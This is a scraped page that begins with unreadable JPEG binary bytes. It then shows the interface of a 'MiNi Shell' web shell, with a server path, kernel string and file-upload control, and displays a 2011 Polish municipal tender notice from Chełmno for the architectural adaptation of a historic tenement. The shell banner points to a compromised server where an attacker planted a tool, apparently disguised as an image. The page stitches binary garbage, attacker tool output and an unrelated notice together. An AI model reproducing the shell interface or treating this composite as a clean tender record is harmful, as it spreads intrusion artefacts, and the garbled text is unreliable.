JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110530/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110530/133856-N-2011.html

<p class="kh_header"><b>Chełmno: Opracowanie projektu budowlano - wykonawczego wraz z kosztorysami (inwestorskim i przedmiarem robót) i opracowaniami towarzyszącymi określonymi w  specyfikacji istotnych warunków zamówienia dla przedsięwzięcia inwestycyjnego pod nazwą: -Adaptacja kamienicy przy ul. Grudziądzkiej 36 na cele turystyczno - administracyjne oraz społeczne- zgodnie z Lokalnym Programem Rewitalizacji Miasta Chełmna na lata 2009 - 2015.</b><br>
<b>Numer ogłoszenia: 133856 - 2011; data zamieszczenia: 30.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasto Chełmno , ul. Dworcowa 1, 86-200 Chełmno, woj. kujawsko-pomorskie, tel. 56 6771729, faks 56 6771774.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chelmno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie projektu budowlano - wykonawczego wraz z kosztorysami (inwestorskim i przedmiarem robót) i opracowaniami towarzyszącymi określonymi w  specyfikacji istotnych warunków zamówienia dla przedsięwzięcia inwestycyjnego pod nazwą: -Adaptacja kamienicy przy ul. Grudziądzkiej 36 na cele turystyczno - administracyjne oraz społeczne- zgodnie z Lokalnym Programem Rewitalizacji Miasta Chełmna na lata 2009 - 2015..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia jest opracowanie projektu budowlano - wykonawczego wraz z kosztorysami (inwestorskim i przedmiarem robót) i opracowaniami towarzyszącymi określonymi w dalszej części SIWZ dla przedsięwzięcia inwestycyjnego pod nazwą: -Adaptacja kamienicy przy ul. Grudziądzkiej 36 na cele turystyczno - administracyjne oraz społeczne- zgodnie z Lokalnym Programem Rewitalizacji Miasta Chełmna na lata 2009 - 2015. 
a)	Obszar opracowania obejmuje teren nieruchomości położonej przy                ul. Grudziądzka 36 - działka nr 106(3, na którym znajdują się budynek główny oraz oficyna; 
b)	Zakres zadania obejmuje opracowanie projektu:
- adaptacji budynku głównego na funkcję obsługi ruchu turystycznego, funkcje administracyjne i wystawiennicze,
- adaptacji i rozbudowy (nadbudowy) oficyny z przeznaczeniem na funkcje dziennego domu opieki dla osób starszych,
- zagospodarowania terenu działki nr 106(3.
2)	W ramach przedmiotu zamówienia, Wykonawca opracuje:
a)	ocenę stanu technicznego budynków wraz z ich inwentaryzacją,
b)	badania i ekspertyzy wymagane przez wojewódzkiego konserwatora zabytków, określone w piśmie z dnia 2.02.2011. znak WUOZ(T(UAB-4171-2-4(11
c)	ocenę stanu technicznego przyłączy infrastrukturalnych,
d)	audyt energetyczny budynków (głównego i oficyny),
e)	plan zagospodarowania terenu - działki nr 106/3,  
f)	koncepcję adaptacji obiektów, na podstawie której, opracowane zostaną właściwe projekty budowlane (po jej zatwierdzeniu przez burmistrza), koncepcja winna uwzględniać wyniki analizy określonej w punkcie - g,
g)	analizę wariantów dotyczących adaptacji lub usunięcia oficyny i budowy       w jej miejsce nowego obiektu - o sposobie wyboru realizacji zdecyduje analiza kosztów i możliwości wykonania zgodnie z planem miejscowymi i uzgodnieniami z Wojewódzkim Konserwatorem Zabytków,
h)	projekty budowlane i wykonawcze dla następujących branż:
- architektura,
- konstrukcja,
- instalacje wewnętrzne (niezależne dla budynku głównego i oficyny): wodna, kanalizacyjna, gazowa, centralnego ogrzewania wraz z montażem kotła zasilającego i możliwością pracy w dwóch niezależnych obiegach (odrębnie oficyna i budynek główny, dopuszcza się zaprojektowanie jednego źródła ciepła), teletechniczna (dopuszcza się projektowanie wewnętrznej sieci internetowej jako bezprzewodowej) , elektryczna, wentylacyjno - klimatyzacyjna, ciepłej wody użytkowej (z uwzględnieniem możliwości zastosowania technologii ekologicznych, np. panele słoneczne), alarmowa - przeciwwłamaniowa i przeciwpożarowa, 
- instalacje zewnętrzne: odgromowa; inne, np. wodne, kanalizacyjne, gazowe itd. jeżeli będą wymagały przełożenia na podstawie przeprowadzonej oceny stanu technicznego i obecnych parametrów urządzeń),
i) dla poszczególnych branż opracowane zostaną:
- kosztorysy inwestorskie oraz przedmiary robót, 
- Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych, 
- Plan Bezpieczeństwa i Ochrony Zdrowia (BIOZ) zgodnie z obowiązującymi w tym zakresie przepisami prawa; 
j) zbiorcze zestawienie kosztów dla całego przedsięwzięcia ( w rozbiciu na poszczególne obiekty)

3)	Wykonawca we własnym zakresie pozyska podkłady geodezyjne niezbędne do projektowania; wystąpi o wytyczne do projektowania do gestorów sieci (jeżeli obecne parametry są niewystarczające); wystąpi o wytyczne do Wojewódzkiego Konserwatora Zabytków w Toruniu a następnie uzyska stosowne uzgodnienia sporządzonego projektu budowlanego. 
4)	W przypadku zaistnienia konieczności uzyskania decyzji o środowiskowych uwarunkowaniach  dla zakresu objętego opracowaniami projektowymi, wykonawca wystąpi z wnioskiem o wydanie takiej decyzji i dołączy niezbędne opracowania i dokumenty - wynikające z ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227, ze zm.).
5)	Szczegółowy opis zadania i obiektów oraz ustalenia dotyczące programu funkcjonalno - użytkowego jak również zakres prac budowlanych w tym nowej aranżacji wnętrz zawarte zostały w Lokalnym Programie Rewitalizacji miasta Chełmna na lata 2009 - 2015. Wyciąg dotyczący przedmiotowego zagadnienia stanowi załącznik nr 8 do siwz.
6)	Zakres prac projektowych dla budynku głównego powinien obejmować:
a) osuszenie obiektu, jeżeli stwierdzona zostanie taka potrzeba,
b) naprawę elewacji, z możliwością jej ocieplenia jeżeli zachodzi taka potrzeba a pozwalają na to warunki konserwatorskie,
c) wymianę/naprawę konstrukcji dachowej i pokrycia dachowego,
d) wymianę stolarki okiennej i drzwiowej (nie dotyczy drzwi frontowych),
e) projekty branżowe zgodnie z punktem 3, ppkt. 2 h siwz,
f) adaptację wnętrz do nowych funkcji z możliwością zaprojektowania nowej dyspozycji wnętrz z uwzględnieniem walorów zabytkowych obiektu w oparciu o wstępny (orientacyjny) program użytkowy,
g) dostosowanie obiektu do potrzeb osób niepełnosprawnych - jeżeli warunki konserwatorskie na to pozwalają,
7)	Zakres prac projektowych dla budynku oficyny powinien obejmować, w przypadku realizacji nowego obiektu:
a) projekt rozbiórki istniejącego budynku,
b) kompletny wielobranżowy projekt budowlano - wykonawczy dla realizacji nowego obiektu,
8)	Zakres prac projektowych dla budynku oficyny powinien obejmować, w przypadku przebudowy i adaptacji istniejącego obiektu:
a) osuszenie obiektu, jeżeli stwierdzona zostanie taka potrzeba,
b) naprawę elewacji, z możliwością jej ocieplenia jeżeli zachodzi taka potrzeba a pozwalają na to warunki konserwatorskie,
c) podniesienie obiektu o jedną kondygnację,
d) wymianę stolarki okiennej i drzwiowej,
e) projekty branżowe zgodnie z punktem 3, ppkt. 2 h siwz,
f) adaptację wnętrz do nowych funkcji z możliwością zaprojektowania nowej dyspozycji wnętrz z uwzględnieniem walorów zabytkowych obiektu w oparciu o wstępny (orientacyjny) program użytkowy,
g) dostosowanie obiektu do potrzeb osób niepełnosprawnych i starszych, 
9)	Zakres prac projektowych dotyczących zagospodarowania terenu:
a) projekt rozbiórki istniejących na działce obiektów a nie przewidzianych do dalszego funkcjonowania,
b) projekt zagospodarowania zieleni,
c) projekt dostosowania terenu działki do korzystania przez turystów oraz osoby niepełnosprawne.
10)	Dodatkowe wymagania dotyczące trybu realizacji:
a)	z uwagi na położenie nieruchomości objętej przedmiotem zamówienia, w strefie ochrony konserwatorskiej -A- oraz znaczną zabytkową wartość obiektu frontowego, konieczna jest ścisła współpraca projektanta z Wojewódzkim Konserwatorem Zabytków w Toruniu na każdym etapie projektowania, zarówno w zakresie projektu prac na zewnątrz jak i wewnątrz,
b)	w zakresie dotyczącym dyspozycji wnętrz budynku frontowego, projektant będzie współpracował z Referatem Oświaty, Kultury i Promocji Urzędu Miasta Chełmna oraz Dyrekcją Muzeum Ziemi Chełmińskiej,
c)	w zakresie dotyczącym dyspozycji wnętrz oficyny, projektant będzie współpracował z Miejskim Ośrodkiem Pomocy Społecznej w Chełmnie,
d)	w przypadku centralnego źródła ciepła należy zaprojektować możliwość odrębnego zasilania w ciepło i ciepłą wodę do budynku frontowego i oficyny wraz z opomiarowaniem,
e)	standard wyposażenia pomieszczeń winien zawierać podstawowe elementy wyposażenia niezbędne do funkcjonowania lokalu..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.24.00.00-2, 71.32.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Ocena spełnienia wyżej wymienionych warunków będzie realizowana metodą spełnia - nie spełnia w oparciu o złożone dokumenty i oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie doświadczenia zamawiający wymaga aby wykonawca zrealizował w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 projekt budowlany obejmujący wykonanie lub remont obiektu budowlanego o kubaturze nie mniejszej niż 1.000 m3 oraz wartości kosztu opracowania projektu budowlanego nie mniejszej niż 40.000,00 zł (czterdzieści tysięcy złotych) brutto. Ocena spełnienia wyżej wymienionych warunków będzie realizowana metodą spełnia - nie spełnia w oparciu o złożone dokumenty i oświadczenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do realizacji zamówienia zamawiający wymaga aby wykonawca dysponował osobami posiadającymi uprawnienia budowlane do projektowania w branżach: konstrukcyjno-budowlanej bez ograniczeń; instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń; instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń. 
W każdej z branż minimum 1 - osoba; dopuszczalne jest aby jedna osoba posiadała kilka uprawnień. Ocena spełnienia wyżej wymienionych warunków będzie realizowana metodą spełnia - nie spełnia w oparciu o złożone dokumenty i oświadczenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie zdolności finansowej zamawiający wymaga aby wykonawca posiadał aktualna polisę OC w zakresie prowadzonej działalności na kwotę nie nisza niż 100.000,00 złotych (sto tysięcy złotych). Ocena spełnienia wyżej wymienionych warunków będzie realizowana metodą spełnia - nie spełnia w oparciu o złożone dokumenty i oświadczenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a)	W przypadku, gdy wykonawca wykazuje się spełnieniem warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 ustawy, polegając na zasobach innego podmiotu na zasadach wskazanych w treści art. 26 ust. 2b ustawy, a podmioty te będą brały udział w realizacji zamówienia zamawiający żąda złożenia wraz z ofertą dokumentów o których mowa w pkt. 6, ppkt. 2 SIWZ  (dotyczących podmiotów trzecich). 
b)	W przypadku gdy wykonawca polega na zasobach innych podmiotów (tzw. trzecich) powołując się na przepis art. 26 ust. 2b ustawy Pzp wraz z ofertą składa pisemne zobowiązanie do udostępnienia zasobów wystawione przez podmiot trzeci. Przedmiotowe zobowiązanie musi określać, jakie zasoby zostają udostępnione wykonawcy oraz w jaki sposób nastąpi udostępnienie tych zasobów.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	Zamawiający przewiduje zmiany postanowień umowy w niżej wymienionym zakresie i przypadkach:
a)	w zakresie  zmiany stawki i kwoty podatku VAT oraz wynagrodzenia brutto; 
b)	w zakresie zmiany terminu realizacji umowy w przypadku  problemów z uzgodnieniem projektu budowlanego przez właściwe organy; 
c)	w zakresie zmiany terminu realizacji umowy w przypadku  nałożenia przez wojewódzkiego konserwatora zabytków obowiązku przeprowadzenia dodatkowych badań i analiz, które nie zostały określone w piśmie z dnia 2.02.2011. znak WUOZ/T/UAB-4171-2-4/11 stanowiącym załącznik do SIWZ;  
d)	w zakresie zmiany terminu realizacji umowy w przypadku  zaistnienia konieczności uzyskania decyzji o środowiskowych uwarunkowaniach  dla zakresu objętego opracowaniami projektowymi;
e)	zmiana w zakresie podwykonawców i osób przewidzianych do realizacji zamówienia pod warunkiem, że ich uprawnienia, potencjał ekonomiczny, wykonawczy i doświadczenie nie są gorsze od tych, które były wskazane w ofercie przetargowej;
f)	zmiana w zakresie przewidywanego kosztu realizacji inwestycji w przypadku braku możliwości ograniczenia kosztu w ramach kwoty określonej przez zamawiającego.
2) Okoliczności upoważniające do zmiany postanowień umowy:
	a) dotyczy pkt. 1 a - zmiana będzie możliwa w przypadku zmian ustawowych dotyczących wysokości podatku VAT; wynagrodzenie netto pozostaje bez zmian;
	b) dotyczy pkt. 1 b - zmiana będzie możliwa jeżeli wykonawca wykaże, że dochował należytej staranności w procesie uzgadniania, tj. wystąpił o uzgodnienie z wyprzedzeniem umożliwiającym uzyskanie uzgodnienia w terminie przewidzianym w odrębnych przepisach (w szczególności dotyczy to kpa, prawa budowlanego, ustawy o ochronie zabytków i opiece nad zabytkami, itd.); w przypadku gdy organ wydający uzgodnienie przekroczył czas określony w przepisach a przeznaczony na dokonanie uzgodnień; zaistnienie okoliczności stanowiących podstawę do przedłużenia terminu wykonawca zgłasza zamawiającemu niezwłocznie po wystąpieniu danego zjawiska a zamawiający akceptuje zamianę uznając racje wykonawcy lub odmawia, rozstrzygnięcie nastąpi w formie pisemnej; przedłużenie terminu następuje o różnicę czasu pomiędzy wymaganym terminem przedstawienia uzgodnień a faktycznym terminem ich przekazania;
	c) dotyczy pkt. 1 c - zmiana będzie możliwa jeżeli wykonawca przedstawi pismo wojewódzkiego konserwatora zabytków, z którego będzie wynikała konieczność wykonania dodatkowych badań i analiz; określenie czasu przedłużenia uzależnione będzie od zakresu, stopnia komplikacji i pracochłonności opracowania wymaganego dokumentu, zostanie to określone stosownym protokołem podpisanym przez strony umowy;
	d) dotyczy pkt. 1 d - zmiana będzie możliwa jeżeli wykonawca przedstawi dokument, z którego będzie wynikał obowiązek przeprowadzenia postępowania z zakresu ochrony środowiska oraz wykaże, że postępowanie to wstrzymuje proces projektowania, pisemna akceptacja zamawiającego będzie podstawą do przedłużenia terminu na czas wymagany do przeprowadzenia procedury środowiskowej;  
	e) dotyczy pkt. 1 e - zmiany te mogą nastąpić z przyczyn organizacyjnych;
	f) dotyczy pkt. 1 f - zmiana kwoty będzie możliwa jeżeli wykonawca wykaże, że pomimo zastosowania należytej staranności w określeniu zakresu robót i kosztów inwestycji zarówno w odniesieniu do zaprojektowanych materiałów jak i robocizny, nie jest możliwe wykonanie inwestycji w cenie wskazanej przez zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.chelmno.pl<br>
